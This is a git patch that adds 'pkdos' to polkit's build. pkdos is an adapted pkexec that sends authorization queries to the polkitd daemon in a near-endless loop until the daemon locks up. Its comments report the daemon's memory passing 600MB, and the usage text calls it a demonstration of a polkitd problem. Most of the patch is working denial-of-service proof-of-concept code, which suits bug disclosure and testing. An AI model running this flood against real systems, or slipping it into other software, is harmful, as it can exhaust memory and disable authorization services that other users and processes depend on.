From c4d9172f1df845ab0efa5f0fbe58ae04ee33a8cb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Petr=20Mr=C3=A1zek?= Date: Thu, 15 Jul 2010 05:53:13 +0200 Subject: [PATCH] polkitd DoS utility --- src/programs/Makefile.am | 16 ++++- src/programs/pkdos.c | 161 ++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 176 insertions(+), 1 deletions(-) create mode 100644 src/programs/pkdos.c diff --git a/src/programs/Makefile.am b/src/programs/Makefile.am index 5c8a26f..a896e00 100644 --- a/src/programs/Makefile.am +++ b/src/programs/Makefile.am @@ -17,7 +17,7 @@ INCLUDES = \ # ---------------------------------------------------------------------------------------------------- -bin_PROGRAMS = pkexec pkcheck pkaction +bin_PROGRAMS = pkexec pkcheck pkaction pkdos # ---------------------------------------------------------------------------------------------------- @@ -70,6 +70,20 @@ pkcheck_LDADD = \ # ---------------------------------------------------------------------------------------------------- +pkdos_SOURCES = pkdos.c + +pkdos_CFLAGS = \ + $(GLIB_CFLAGS) \ + $(NULL) + +pkdos_LDADD = \ + $(GLIB_LIBS) \ + $(top_builddir)/src/polkit/libpolkit-gobject-1.la \ + $(NULL) + + +# ---------------------------------------------------------------------------------------------------- + pkaction_SOURCES = pkaction.c pkaction_CFLAGS = \ diff --git a/src/programs/pkdos.c b/src/programs/pkdos.c new file mode 100644 index 0000000..7536ec8 --- /dev/null +++ b/src/programs/pkdos.c @@ -0,0 +1,161 @@ +/* + * Copyright (C) 2008 Red Hat, Inc. + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General + * Public License along with this library; if not, write to the + * Free Software Foundation, Inc., 59 Temple Place, Suite 330, + * Boston, MA 02111-1307, USA. + * + * Author: David Zeuthen + * Changes by: Petr Mrazek + */ + +/* Cannibalized pkexec. + * This just DoSes the daemon with (almost) limitless queries. + */ + +#ifdef HAVE_CONFIG_H +# include "config.h" +#endif + +#define _GNU_SOURCE + +#include +#include +#include + +#include + +static void +usage (int argc, char *argv[]) +{ + g_printerr ("pkdos --version |\n" + " --help |\n" + "\n" + "This serves only as a demostration of a problem in polkitd.\n"); +} + +/* ---------------------------------------------------------------------------------------------------- */ + +int +main (int argc, char *argv[]) +{ + guint n; + guint ret; + gboolean opt_show_help; + gboolean opt_show_version; + PolkitAuthority *authority; + PolkitAuthorizationResult *result; + PolkitSubject *subject; + PolkitDetails *details; + GError *error; + gchar *action_id; + pid_t pid_of_caller; + int counter; + + ret = 127; + authority = NULL; + subject = NULL; + details = NULL; + result = NULL; + action_id = NULL; + counter = 0; + + /* First process some basic options. + */ + opt_show_help = FALSE; + opt_show_version = FALSE; + for (n = 1; n < (guint) argc; n++) + { + if (strcmp (argv[n], "--help") == 0) + { + opt_show_help = TRUE; + } + else if (strcmp (argv[n], "--version") == 0) + { + opt_show_version = TRUE; + } + else + { + break; + } + } + + if (opt_show_help) + { + usage (argc, argv); + ret = 0; + goto out; + } + else if (opt_show_version) + { + g_print ("pkdos version %s\n", PACKAGE_VERSION); + ret = 0; + goto out; + } + + /* Initialize the GLib type system - this is needed to interact with the + * PolicyKit daemon + */ + g_type_init (); + + /* now check if the program that invoked us is authorized */ + pid_of_caller = getppid (); + if (pid_of_caller == 1) + { + /* getppid() can return 1 if the parent died (meaning that we are reaped + * by /sbin/init); get process group leader instead - for example, this + * happens when launching via gnome-panel (alt+f2, then 'pkexec gedit'). + */ + pid_of_caller = getpgrp (); + } + + subject = polkit_unix_process_new (pid_of_caller); + if (subject == NULL) + { + g_printerr ("No such process for pid %d: %s\n", (gint) pid_of_caller, error->message); + g_error_free (error); + goto out; + } + + authority = polkit_authority_get (); + details = NULL; + action_id = "i.like.icecream"; // Totally arbitrary. I really do though :) + error = NULL; + + /* The real meat of the 'program'. + * Ask for authorization over and over again until the daemon locks up. + * Also, I'm being nice here by providing a way out. + */ + while (counter != INT_MAX) + { + result = polkit_authority_check_authorization_sync (authority, + subject, + action_id, + details, + POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION, + NULL, + &error); + counter++; + if(counter % 1000 == 0) + { + g_printerr ("."); + } + error = NULL; + } + // Freeing up resources is not a priority. It locks up anyway. + // During testing, the memory usage of the *daemon* grew over 600MB. Strange? + out: + return ret; +} + -- 1.7.1.1